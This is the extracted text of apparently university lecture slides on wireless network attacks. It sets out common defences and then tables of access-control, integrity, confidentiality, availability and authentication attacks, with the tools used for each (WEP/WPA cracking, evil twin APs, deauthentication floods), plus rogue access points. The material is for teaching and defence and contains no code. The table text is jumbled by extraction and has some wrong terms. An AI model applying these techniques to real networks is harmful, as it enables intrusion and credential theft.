Lecture 11: Hacking Wireless Networks and Network Attacks PDF

Lecture 11- Hacking Wireless Networks and Network Attacks SECURITY THREATS Lack of physical Use of untrusted Use of untrusted security controls networks mobile devices Use of applications Interaction with Use of untrusted created by other systems content unknown parties Use of location services COMMON DEFENCE TECHNIQUES ❖ Change router default user name and password ❖ Change the internal IP subnet if possible ❖ Change default name and hide broadcasting of the SSID (Service Set Identiﬁer) ❖ None of the attack methods are faster or effective when a larger passphrase is used ❖ Restrict access to your wireless network by filtering access based on the MAC (Media Access Code) addresses ❖ Use Encryption WIRELESS THREATS ❖ Access Control Attack ▪ Aims to penetrate a network by evading WLAN access control measures- AP Mac filters and Wi- Fi port access control Access Control Attack Type of Attack Description Methods and Tools Discovering wireless LANs by listening to beacons or sending Airmon-ng, DStumbler, KisMAC, War Driving probe requests, thereby MacStumbler, NetStumbler, providing launch point for Wellenreiter, WiFiFoFum further attacks. Installing an unsecured AP Rogue Access Points inside firewall, creating open Any hardware or software AP backdoor into trusted network. Connecting directly to an Any wireless card or USB Ad Hoc Associations unsecured station to circumvent adapter AP security or to attack station. Reconfiguring an attacker's MacChanger, SirMACsAlot, MAC Spoofing MAC address to pose as an SMAC, Wellenreiter, wicontrol authorized AP or station. Recovering RADIUS secret by Packet capture tool on LAN or 802.1X RADIUS Cracking brute force from 802.1X access network path between AP and request, for use by evil twin AP. RADIUS server 5 WIRELESS THREATS ❖ Integrity Attacks ▪ Attacker send forged control, management or data frames over a wireless network to misdirect the wireless device in order to perform another type of attack INTEGRITY ATTACKS Type of Attack Description Methods and Tools Airpwn, File2air, libradiate, Crafting and sending forged 802.11 Frame Injection void11, WEPWedgie, wnet 802.11 frames. dinject/reinject Capturing 802.11 data frames 802.11 Data Replay Capture + Injection Tools for later (modified) replay. Capturing 802.1X Extensible Authentication Protocols (e.g., Wireless Capture + Injection 802.1X EAP Replay EAP Identity, Success, Failure) Tools between station and AP for later replay. Capturing RADIUS Access- Ethernet Capture + Injection 802.1X RADIUS Replay Accept or Reject messages for Tools between AP and later replay. authentication server 7 WIRELESS THREATS ❖ Confidentiality Attacks ▪ Attacks attempts to intercept Confidential information send over wireless associations, whether send in the clear text or encryption by Wi-Fi protocols CONFIDENTIALITY ATTACKS Type of Attack Description Methods and Tools Capturing and decoding bsd-airtools, Ettercap, Kismet, unprotected application Eavesdropping Wireshark, commercial traffic to obtain potentially analyzers sensitive information. Aircrack-ng, airoway, Capturing data to recover a AirSnort, chopchop, WEP Key Cracking WEP key using passive or dwepcrack, WepAttack, active methods. WepDecrypt, WepLab, wesside Masquerading as an cqureAP, D-Link G200, authorized AP by beaconing Evil Twin AP HermesAP, Rogue Squadron, the WLAN's service set WifiBSD identifier (SSID) to lure users. Running a phony portal or Web server on an evil twin AP Airpwn, Airsnarf, Hotspotter, AP Phishing to "phish" for user logins, Karma, RGlueAP credit card numbers. Running traditional man-in- the-middle attack tools on an Man in the Middle dsniff, Ettercap-NG, sshmitm evil twin AP to intercept TCP sessions or SSL/SSH tunnels. 9 WIRELESS THREATS ❖ Availability Attacks ▪ Denial of service attack aim to prevent legitimate users from accessing resources in a wireless network AVAILABILITY ATTACKS Type of Attack Description Methods and Tools Physically removing an AP from a AP Theft "Five finger discount" public space. Exploiting the CSMA/CA Clear An adapter that supports CW Tx Channel Assessment (CCA) Queensland DoS mode, with a low-level utility to mechanism to make a channel invoke continuous transmit appear busy. Generating thousands of counterfeit 802.11 Beacon Flood 802.11 beacons to make it hard for FakeAP stations to find a legitimate AP. Sending forged Authenticates or 802.11 Associate / Authenticate Flood Associates from random MACs to fill FATA-Jack, Macfld a target AP's association table. Generating invalid TKIP data to 802.11 TKIP MIC Exploit exceed the target AP's MIC error File2air, wnet dinject, LORCON threshold, suspending WLAN service. Flooding station(s) with forged Aireplay, Airforge, MDK, void11, 802.11 Deauthenticate Flood Deauthenticates or Disassociates to commercial WIPS disconnecting users from an AP. Flooding an AP with EAP-Start 802.1X EAP-Start Flood messages to consume resources or QACafe, File2air, libradiate crash the target. Observing a valid 802.1X EAP exchange, and then sending the 802.1X EAP-Failure QACafe, File2air, libradiate station a forged EAP-Failure message. Sending a malformed 802.1X EAP 802.1X EAP-of-Death Identity response known to cause QACafe, File2air, libradiate some APs to crash. 11 Sending EAP type-specific messages WIRELESS THREATS ❖ Authentication Attacks ▪ To steal the identity of Wi-Fi client, their personal information, login credentials etc. to gain unauthorised access to network resources AUTHENTICATION ATTACKS Type of Attack Description Methods and Tools Attempting 802.11 Shared Key Shared Key Guessing Authentication with guessed, vendor WEP Cracking Tools default or cracked WEP keys. Recovering a WPA/WPA2 PSK from coWPAtty, genpmk, KisMAC, PSK Cracking captured key handshake frames using wpa_crack a dictionary attack tool. Capturing user credentials (e.g., e- Ace Password Sniffer, Dsniff, PHoss, Application Login Theft mail address and password) from WinSniffer cleartext application protocols. Recovering user credentials (e.g., Windows login and password) by Domain Login Cracking cracking NetBIOS password hashes, John the Ripper, L0phtCrack, Cain using a brute-force or dictionary attack tool. Recovering user credentials (e.g., PPTP password or IPsec Preshared ike_scan and ike_crack (IPsec), anger VPN Login Cracking Secret Key) by running brute-force and THC-pptp-bruter (PPTP) attacks on VPN authentication protocols. Capturing user identities from 802.1X Identity Theft cleartext 802.1X Identity Response Capture Tools packets. Using a captured identity, repeatedly 802.1X Password Guessing attempting 802.1X authentication to Password Dictionary guess the user's password. Recovering user credentials from captured 802.1X Lightweight EAP 802.1X LEAP Cracking (LEAP) packets using a dictionary Anwrap, Asleap, THC-LEAPcracker attack tool to crack the NT password 13 hash. ROGUE ACCESS POINT ATTACK ❖ Rouge wireless access point placed into an 802.11 network can be used to hijack the connection of legitimate network user ❖ When the user turn on the computer, the rogue wireless access point will offer the connect with the network user’s NIC ❖ All the traffic the users enters will pass through the rogue access point, thus enabling a form of wireless packet sniffing CLIENT MIS-ASSOCIATION ❖ Attacker sets up a rouge access point outside the corporate perimeter and lures the employees of the organization to connect with it ❖ Once associated, employees may bypass the enterprise security policies OTHER ATTACKS ❖ Misconfigured Access Point Attack ❖ Unauthorised Association ❖ HoneySpot Access Point attack ❖ AP MAC Spoofing ❖ Denial of service attack ❖ Jamming Signal attack

Lecture 11: Hacking Wireless Networks and Network Attacks PDF

Document Details

Tags

Related

Summary

Full Transcript

Upgrade to continue